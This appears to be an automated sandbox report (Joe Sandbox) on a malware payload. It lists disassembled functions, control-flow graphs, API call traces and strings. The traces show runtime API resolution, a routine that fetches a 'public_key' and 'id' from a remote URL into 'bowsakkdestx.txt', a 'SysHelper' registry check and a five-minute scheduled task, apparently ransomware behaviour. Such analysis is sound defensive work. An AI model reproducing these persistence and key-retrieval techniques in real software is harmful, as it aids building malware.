                                                                                                        • GetProcAddress.KERNEL32(00000000,GetForegroundWindow), ref: 00F91C50
                                                                                                        • GetProcAddress.KERNEL32(?,GetCursorInfo), ref: 00F91C63
                                                                                                        • GetProcAddress.KERNEL32(?,GetQueueStatus), ref: 00F91C76
                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00F91D45
                                                                                                        • GetProcAddress.KERNEL32(?,CreateToolhelp32Snapshot), ref: 00F91D73
                                                                                                        • GetProcAddress.KERNEL32(?,CloseToolhelp32Snapshot), ref: 00F91D86
                                                                                                        • GetProcAddress.KERNEL32(?,Heap32First), ref: 00F91D99
                                                                                                        • GetProcAddress.KERNEL32(?,Heap32Next), ref: 00F91DAC
                                                                                                        • GetProcAddress.KERNEL32(?,Heap32ListFirst), ref: 00F91DBF
                                                                                                        • GetProcAddress.KERNEL32(?,Heap32ListNext), ref: 00F91DD2
                                                                                                        • GetProcAddress.KERNEL32(?,Process32First), ref: 00F91DE5
                                                                                                        • GetProcAddress.KERNEL32(?,Process32Next), ref: 00F91DF8
                                                                                                        • GetProcAddress.KERNEL32(?,Thread32First), ref: 00F91E0B
                                                                                                        • GetProcAddress.KERNEL32(?,Thread32Next), ref: 00F91E1E
                                                                                                        • GetProcAddress.KERNEL32(?,Module32First), ref: 00F91E31
                                                                                                        • GetProcAddress.KERNEL32(?,Module32Next), ref: 00F91E44
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 00F91EDD
                                                                                                        • GetTickCount.KERNEL32 ref: 00F91F03
                                                                                                        • Heap32ListFirst.KERNEL32(00000000,00000010), ref: 00F91F1A
                                                                                                        • Heap32First.KERNEL32(00000024,?,?), ref: 00F91F95
                                                                                                        • Heap32Next.KERNEL32(?,?,?,?,?,44DAE971), ref: 00F91FE3
                                                                                                        • GetTickCount.KERNEL32 ref: 00F91FF1
                                                                                                        • Heap32ListNext.KERNEL32(?,?), ref: 00F92058
                                                                                                        • GetTickCount.KERNEL32 ref: 00F92066
                                                                                                        • GetTickCount.KERNEL32 ref: 00F92095
                                                                                                        • Process32First.KERNEL32(?,00000128), ref: 00F920AA
                                                                                                        • GetTickCount.KERNEL32 ref: 00F920FB
                                                                                                        • GetTickCount.KERNEL32 ref: 00F92118
                                                                                                        • GetTickCount.KERNEL32 ref: 00F92187
                                                                                                        • GetTickCount.KERNEL32 ref: 00F921A4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$CountTick$Library$Heap32Load$FirstFree$ListNextStatistics$CreateProcess32SnapshotToolhelp32Version
                                                                                                        • String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$GetCursorInfo$GetForegroundWindow$GetQueueStatus$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next$USER32.DLL
                                                                                                        • API String ID: 4174345323-1723836103
                                                                                                        • Opcode ID: 9f2a7975f97b1db7cb86e954541b7f0b68e48e922d448996ed49ff5620b1aea3
                                                                                                        • Instruction ID: 0cfc96efacb8aeb276debaadf92bed526c885c4868cbd880247ad787918c4295
                                                                                                        • Opcode Fuzzy Hash: 9f2a7975f97b1db7cb86e954541b7f0b68e48e922d448996ed49ff5620b1aea3
                                                                                                        • Instruction Fuzzy Hash: 5132BFB0E0022D9AEF619F68CC45B9EB7B9FF41714F0041EAA64CE6191EB758E80DF54
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F2E690 Relevance: 110.9, APIs: 54, Strings: 9, Instructions: 696stringnetworkfileCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 776 f2e690-f2e6d8 call f3f7c0 timeGetTime call f33f74 call f1c6a0 783 f2e6e0-f2e6e6 776->783 784 f2e6f0-f2e722 call f3b420 call f1c500 783->784 789 f2e724-f2e729 784->789 790 f2e72e-f2e772 InternetOpenW 784->790 791 f2ea1f-f2ea40 call f33cf0 789->791 792 f2e774-f2e776 790->792 793 f2e778-f2e77d 790->793 801 f2ea42-f2ea46 791->801 802 f2ea8d-f2eacc lstrlenA lstrcpyA * 2 lstrlenA 791->802 795 f2e78f-f2e7b8 call f25ae0 call f31c02 792->795 796 f2e780-f2e789 793->796 816 f2e882-f2e8e5 call f25ae0 call f23ff0 call f22900 call f259d0 795->816 817 f2e7be-f2e7f7 call f24690 call f1dd40 795->817 796->796 798 f2e78b-f2e78d 796->798 798->795 804 f2ee2a call f21b10 801->804 805 f2ea4c-f2ea61 SHGetFolderPathA 801->805 806 f2eace 802->806 807 f2eaef-f2eb12 802->807 818 f2ee2f-f2ee3a 804->818 805->784 813 f2ea67-f2ea88 PathAppendA DeleteFileA 805->813 808 f2ead0-f2ead8 806->808 811 f2eb14-f2eb16 807->811 812 f2eb18-f2eb1f 807->812 814 f2eada-f2eae7 lstrlenA 808->814 815 f2eaeb 808->815 819 f2eb2b-f2eb4f call f256d0 call f22900 811->819 820 f2eb22-f2eb27 812->820 813->784 814->808 821 f2eae9 814->821 815->807 872 f2e8f3-f2e917 lstrcpyW 816->872 873 f2e8e7-f2e8f0 call f32587 816->873 840 f2e7f9-f2e7fe 817->840 841 f2e86f-f2e874 817->841 823 f2ee3c-f2ee3f 818->823 824 f2ee4d-f2ee82 call f1ef50 818->824 845 f2eb53-f2eb66 lstrcpyW 819->845 846 f2eb51 819->846 820->820 826 f2eb29 820->826 821->807 823->783 837 f2ee86-f2ee8c 824->837 826->819 842 f2ee92-f2ee94 837->842 843 f2ee8e-f2ee90 837->843 850 f2e800-f2e809 call f32587 840->850 851 f2e80c-f2e827 840->851 841->816 849 f2e876-f2e87f call f32587 841->849 854 f2ee97-f2ee9c 842->854 852 f2eea0-f2eeaf call f23ea0 843->852 847 f2eb74-f2ebe4 lstrlenA call f30c62 call f3b420 MultiByteToWideChar lstrcpyW call f33cf0 845->847 848 f2eb68-f2eb71 call f32587 845->848 846->845 900 f2ebe6-f2ebea 847->900 901 f2ec3d-f2ec97 lstrlenW lstrlenA lstrcpyA * 2 lstrlenA 847->901 848->847 849->816 850->851 860 f2e842-f2e848 851->860 861 f2e829-f2e82d 851->861 852->837 874 f2eeb1-f2eee3 call f1ef50 852->874 854->854 863 f2ee9e 854->863 866 f2e84e-f2e86c 860->866 861->866 870 f2e82f-f2e840 call f305a0 861->870 863->852 866->841 870->866 879 f2e943-f2e97a InternetOpenUrlW InternetReadFile 872->879 880 f2e919-f2e920 872->880 873->872 893 f2eee7-f2eeed 874->893 887 f2e9ec-f2ea08 InternetCloseHandle * 2 879->887 888 f2e97c-f2e994 SHGetFolderPathA 879->888 880->879 884 f2e922-f2e92e 880->884 891 f2e930-f2e935 884->891 892 f2e937 884->892 889 f2ea16-f2ea19 887->889 890 f2ea0a-f2ea13 call f32587 887->890 888->887 895 f2e996-f2e9c2 PathAppendA call f320b6 888->895 889->791 890->889 897 f2e93c-f2e93d lstrcatW 891->897 892->897 898 f2eef3-f2eef5 893->898 899 f2eeef-f2eef1 893->899 895->887 915 f2e9c4-f2e9e4 lstrlenA call f32b02 call f33a38 895->915 897->879 905 f2eef8-f2eefd 898->905 904 f2ef01-f2ef10 call f23ea0 899->904 900->804 906 f2ebf0-f2ec11 SHGetFolderPathA 900->906 908 f2ec99 901->908 909 f2ecbf-f2ecdd 901->909 904->893 927 f2ef12-f2ef4c call f23ff0 call f22900 904->927 905->905 912 f2eeff 905->912 906->784 914 f2ec17-f2ec38 PathAppendA DeleteFileA 906->914 916 f2eca0-f2eca8 908->916 910 f2ece3-f2eced 909->910 911 f2ecdf-f2ece1 909->911 920 f2ecf0-f2ecf5 910->920 919 f2ecf9-f2ed1b call f256d0 call f22900 911->919 912->904 914->783 932 f2e9e9 915->932 917 f2ecaa-f2ecb7 lstrlenA 916->917 918 f2ecbb 916->918 917->916 924 f2ecb9 917->924 918->909 937 f2ed1f-f2ed35 lstrcpyW 919->937 938 f2ed1d 919->938 920->920 925 f2ecf7 920->925 924->909 925->919 939 f2ef50-f2ef68 lstrcpyW 927->939 940 f2ef4e 927->940 932->887 941 f2ed43-f2edab lstrlenA call f30c62 call f3b420 MultiByteToWideChar lstrcpyW lstrlenW 937->941 942 f2ed37-f2ed40 call f32587 937->942 938->937 945 f2ef76-f2efb3 call f23ff0 call f22900 939->945 946 f2ef6a-f2ef73 call f32587 939->946 940->939 956 f2edbc-f2edc1 941->956 957 f2edad-f2edb6 lstrlenW 941->957 942->941 962 f2efb7-f2efc6 lstrcpyW 945->962 963 f2efb5 945->963 946->945 960 f2edc3-f2ede4 SHGetFolderPathA 956->960 961 f2ee10-f2ee12 956->961 957->956 959 f2ee44-f2ee48 957->959 964 f2f01a-f2f030 959->964 960->784 965 f2edea-f2ee0b PathAppendA DeleteFileA 960->965 966 f2ee14-f2ee1a call f30bed 961->966 967 f2ee1d-f2ee1f 961->967 968 f2efd4-f2efe0 962->968 969 f2efc8-f2efd1 call f32587 962->969 963->962 965->783 966->967 967->804 970 f2ee21-f2ee27 call f30bed 967->970 972 f2efe2-f2efeb call f32587 968->972 973 f2efee-f2f008 968->973 969->968 970->804 972->973 978 f2f016 973->978 979 f2f00a-f2f013 call f32587 973->979 978->964 979->978
                                                                                                        APIs
                                                                                                        • timeGetTime.WINMM(?,?,?,?,?,00FDB3EC,000000FF), ref: 00F2E6C0
                                                                                                          • Part of subcall function 00F1C6A0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,00F2E6D4), ref: 00F1C6C2
                                                                                                          • Part of subcall function 00F1C6A0: RegQueryValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,?), ref: 00F1C6F3
                                                                                                          • Part of subcall function 00F1C6A0: RegCloseKey.ADVAPI32(00000000), ref: 00F1C700
                                                                                                        • _memset.LIBCMT ref: 00F2E707
                                                                                                          • Part of subcall function 00F1C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 00F1C51B
                                                                                                        • InternetOpenW.WININET ref: 00F2E743
                                                                                                        • _wcsstr.LIBCMT ref: 00F2E7AE
                                                                                                        • _memmove.LIBCMT ref: 00F2E838
                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 00F2E90A
                                                                                                        • lstrcatW.KERNEL32(?,&first=false), ref: 00F2E93D
                                                                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00F2E954
                                                                                                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00F2E96F
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F2E98C
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F2E9A3
                                                                                                        • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 00F2E9CD
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00F2E9F3
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00F2E9F6
                                                                                                        • _strstr.LIBCMT ref: 00F2EA36
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F2EA59
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F2EA74
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00F2EA82
                                                                                                        • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 00F2EA92
                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00F2EAA4
                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00F2EABA
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00F2EAC8
                                                                                                        • lstrlenA.KERNEL32(00000022), ref: 00F2EAE3
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F2EB5B
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00F2EB7C
                                                                                                        • _malloc.LIBCMT ref: 00F2EB86
                                                                                                        • _memset.LIBCMT ref: 00F2EB94
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 00F2EBAE
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F2EBB6
                                                                                                        • _strstr.LIBCMT ref: 00F2EBDA
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F2EC00
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F2EC24
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00F2EC32
                                                                                                        • lstrlenW.KERNEL32(?), ref: 00F2EC3E
                                                                                                        • lstrlenA.KERNEL32(","id":"), ref: 00F2EC51
                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00F2EC6D
                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00F2EC7F
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00F2EC93
                                                                                                        • lstrlenA.KERNEL32(00000022), ref: 00F2ECB3
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F2ED2A
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00F2ED4B
                                                                                                        • _malloc.LIBCMT ref: 00F2ED55
                                                                                                        • _memset.LIBCMT ref: 00F2ED63
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 00F2ED7D
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F2ED85
                                                                                                        • lstrlenW.KERNEL32(?), ref: 00F2EDA3
                                                                                                        • lstrlenW.KERNEL32(?), ref: 00F2EDAE
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F2EDD3
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F2EDF7
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00F2EE05
                                                                                                        • _free.LIBCMT ref: 00F2EE15
                                                                                                        • _free.LIBCMT ref: 00F2EE22
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F2EF61
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F2EFBF
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrlen$lstrcpy$Path$FolderInternet$AppendFile$CloseDeleteOpen_memset$ByteCharHandleMultiWide_free_malloc_strstr$QueryReadTimeValue_memmove_wcsstrlstrcattime
                                                                                                        • String ID: "$","id":"$&first=false$&first=true$.bit/$?pid=$Microsoft Internet Explorer$bowsakkdestx.txt${"public_key":"
                                                                                                        • API String ID: 704684250-3586605218
                                                                                                        • Opcode ID: 53b889faa83d4c1b0386d8ec859d1a9331cf7b7606e9563bd2803b4be7eff217
                                                                                                        • Instruction ID: 4207fb255e77c5eeed980dc2708253155412c975dff45614a4fb41ed8462c74c
                                                                                                        • Opcode Fuzzy Hash: 53b889faa83d4c1b0386d8ec859d1a9331cf7b7606e9563bd2803b4be7eff217
                                                                                                        • Instruction Fuzzy Hash: 15424671508351ABDB20EF24DC49B9BBBE8BF84314F14092DF48587292DB74E648DBA2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1D240 Relevance: 58.5, APIs: 25, Strings: 8, Instructions: 702comCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1213 f1d240-f1d274 CoInitialize 1214 f1d276-f1d278 1213->1214 1215 f1d27d-f1d2dd CoInitializeSecurity call f24690 CoCreateInstance 1213->1215 1216 f1da8e-f1da92 1214->1216 1222 f1d2e3-f1d3ca VariantInit * 4 VariantClear * 4 1215->1222 1223 f1da3c-f1da44 CoUninitialize 1215->1223 1218 f1da94-f1da9c call f32587 1216->1218 1219 f1da9f-f1dab1 1216->1219 1218->1219 1230 f1d3e2-f1d3fe call f1b140 1222->1230 1231 f1d3cc-f1d3dd CoUninitialize 1222->1231 1225 f1da69-f1da6d 1223->1225 1226 f1da7a-f1da8a 1225->1226 1227 f1da6f-f1da77 call f32587 1225->1227 1226->1216 1227->1226 1236 f1d400-f1d402 1230->1236 1237 f1d404 1230->1237 1231->1225 1238 f1d406-f1d424 call f1b1d0 1236->1238 1237->1238 1242 f1d426-f1d437 CoUninitialize 1238->1242 1243 f1d43c-f1d451 call f1b140 1238->1243 1242->1225 1247 f1d453-f1d455 1243->1247 1248 f1d457 1243->1248 1249 f1d459-f1d494 call f1b1d0 1247->1249 1248->1249 1255 f1d496-f1d4a7 CoUninitialize 1249->1255 1256 f1d4ac-f1d4c2 1249->1256 1255->1225 1259 f1d4c8-f1d4dd call f1b140 1256->1259 1260 f1da2a-f1da37 1256->1260 1264 f1d4e3 1259->1264 1265 f1d4df-f1d4e1 1259->1265 1260->1223 1266 f1d4e5-f1d508 call f1b1d0 1264->1266 1265->1266 1266->1260 1271 f1d50e-f1d524 1266->1271 1271->1260 1273 f1d52a-f1d542 1271->1273 1273->1260 1276 f1d548-f1d55e 1273->1276 1276->1260 1278 f1d564-f1d57c 1276->1278 1278->1260 1281 f1d582-f1d59b 1278->1281 1281->1260 1283 f1d5a1-f1d5b6 call f1b140 1281->1283 1286 f1d5b8-f1d5ba 1283->1286 1287 f1d5bc 1283->1287 1288 f1d5be-f1d5e1 call f1b1d0 1286->1288 1287->1288 1288->1260 1293 f1d5e7-f1d5fd 1288->1293 1293->1260 1295 f1d603-f1d626 1293->1295 1295->1260 1298 f1d62c-f1d651 1295->1298 1298->1260 1301 f1d657-f1d666 1298->1301 1301->1260 1303 f1d66c-f1d681 call f1b140 1301->1303 1306 f1d683-f1d685 1303->1306 1307 f1d687 1303->1307 1308 f1d689-f1d6a3 call f1b1d0 1306->1308 1307->1308 1308->1260 1312 f1d6a9-f1d6be call f1b140 1308->1312 1315 f1d6c0-f1d6c2 1312->1315 1316 f1d6c4 1312->1316 1317 f1d6c6-f1d6e0 call f1b1d0 1315->1317 1316->1317 1317->1260 1321 f1d6e6-f1d6f4 1317->1321 1321->1260 1323 f1d6fa-f1d70f call f1b140 1321->1323 1326 f1d711-f1d713 1323->1326 1327 f1d715 1323->1327 1328 f1d717-f1d731 call f1b1d0 1326->1328 1327->1328 1328->1260 1332 f1d737-f1d74c call f1b140 1328->1332 1335 f1d752 1332->1335 1336 f1d74e-f1d750 1332->1336 1337 f1d754-f1d76e call f1b1d0 1335->1337 1336->1337 1337->1260 1341 f1d774-f1d7ce call f33aaf call f33551 call f328e0 call f22c40 call f22900 1337->1341 1352 f1d7d0 1341->1352 1353 f1d7d2-f1d7e3 call f1b140 1341->1353 1352->1353 1356 f1d7e5-f1d7e7 1353->1356 1357 f1d7e9 1353->1357 1358 f1d7eb-f1d819 call f1b1d0 call f23210 1356->1358 1357->1358 1358->1260 1365 f1d81f-f1d835 1358->1365 1365->1260 1367 f1d83b-f1d85e 1365->1367 1367->1260 1370 f1d864-f1d889 1367->1370 1370->1260 1373 f1d88f-f1d8ab call f1b140 1370->1373 1376 f1d8b1 1373->1376 1377 f1d8ad-f1d8af 1373->1377 1378 f1d8b3-f1d8cd call f1b1d0 1376->1378 1377->1378 1382 f1d8dd-f1d8f2 call f1b140 1378->1382 1383 f1d8cf-f1d8d8 1378->1383 1387 f1d8f4-f1d8f6 1382->1387 1388 f1d8f8 1382->1388 1383->1260 1389 f1d8fa-f1d91d call f1b1d0 1387->1389 1388->1389 1389->1260 1394 f1d923-f1d98d call f1b400 VariantInit * 2 call f1b140 1389->1394 1399 f1d993 1394->1399 1400 f1d98f-f1d991 1394->1400 1401 f1d995-f1da0e call f1b1d0 VariantClear * 3 1399->1401 1400->1401 1405 f1da10-f1da27 call f3052a 1401->1405 1406 f1da46-f1da67 CoUninitialize 1401->1406 1405->1260 1406->1225
                                                                                                        APIs
                                                                                                        • CoInitialize.OLE32(00000000), ref: 00F1D26C
                                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00F1D28F
                                                                                                        • CoCreateInstance.OLE32(00FE506C,00000000,00000001,00FE4FEC,?,?,00000000,000000FF), ref: 00F1D2D5
                                                                                                        • VariantInit.OLEAUT32(?), ref: 00F1D2F0
                                                                                                        • VariantInit.OLEAUT32(?), ref: 00F1D309
                                                                                                        • VariantInit.OLEAUT32(?), ref: 00F1D322
                                                                                                        • VariantInit.OLEAUT32(?), ref: 00F1D33B
                                                                                                        • VariantClear.OLEAUT32(?), ref: 00F1D397
                                                                                                        • VariantClear.OLEAUT32(?), ref: 00F1D3A4
                                                                                                        • VariantClear.OLEAUT32(?), ref: 00F1D3B1
                                                                                                        • VariantClear.OLEAUT32(?), ref: 00F1D3C2
                                                                                                        • CoUninitialize.OLE32 ref: 00F1D3D5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Variant$ClearInit$Initialize$CreateInstanceSecurityUninitialize
                                                                                                        • String ID: %Y-%m-%dT%H:%M:%S$--Task$2030-05-02T08:00:00$Author Name$PT5M$RegisterTaskDefinition. Err: %X$Time Trigger Task$Trigger1
                                                                                                        • API String ID: 2496729271-1738591096
                                                                                                        • Opcode ID: f8351e9218045c8d540af32496176720ad57129058429b0cdcdb07390c44f287
                                                                                                        • Instruction ID: 498001fc2fcb2d2b8ece050d4b8d836a28908f7ba7d63bf529af21893e918b6b
                                                                                                        • Opcode Fuzzy Hash: f8351e9218045c8d540af32496176720ad57129058429b0cdcdb07390c44f287
                                                                                                        • Instruction Fuzzy Hash: 1F529271E00219DFDB00DBA4CC58FEEBBB5BF49704F148198E505AB291DB35AE85DBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F20FC0 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 149encryptionstringCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00F21010
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F21026
                                                                                                          • Part of subcall function 00F40ECA: RaiseException.KERNEL32(?,?,00F5F299,?,?,?,?,?,?,?,00F5F299,?,01018238,?), ref: 00F40F1F
                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00F2103B
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F21051
                                                                                                        • lstrlenA.KERNEL32(?,00000000), ref: 00F21059
                                                                                                        • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00F21064
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F2107A
                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00F21099
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F210AB
                                                                                                        • _memset.LIBCMT ref: 00F210CA
                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 00F210DE
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F210F0
                                                                                                        • _malloc.LIBCMT ref: 00F21100
                                                                                                        • _memset.LIBCMT ref: 00F2110B
                                                                                                        • _sprintf.LIBCMT ref: 00F2112E
                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00F2113C
                                                                                                        • CryptDestroyHash.ADVAPI32(00000000), ref: 00F21154
                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00F2115F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
                                                                                                        • String ID: %.2X
                                                                                                        • API String ID: 2451520719-213608013
                                                                                                        • Opcode ID: 0a807248b97e10f2b10fd081de65dde7e5f03e89b8ea2ad011bbf5291af09bc5
                                                                                                        • Instruction ID: 4f4eb604ab3fcd41e926586b5c86bab999cb2c7e3d34c52e25dcb08080fb1254
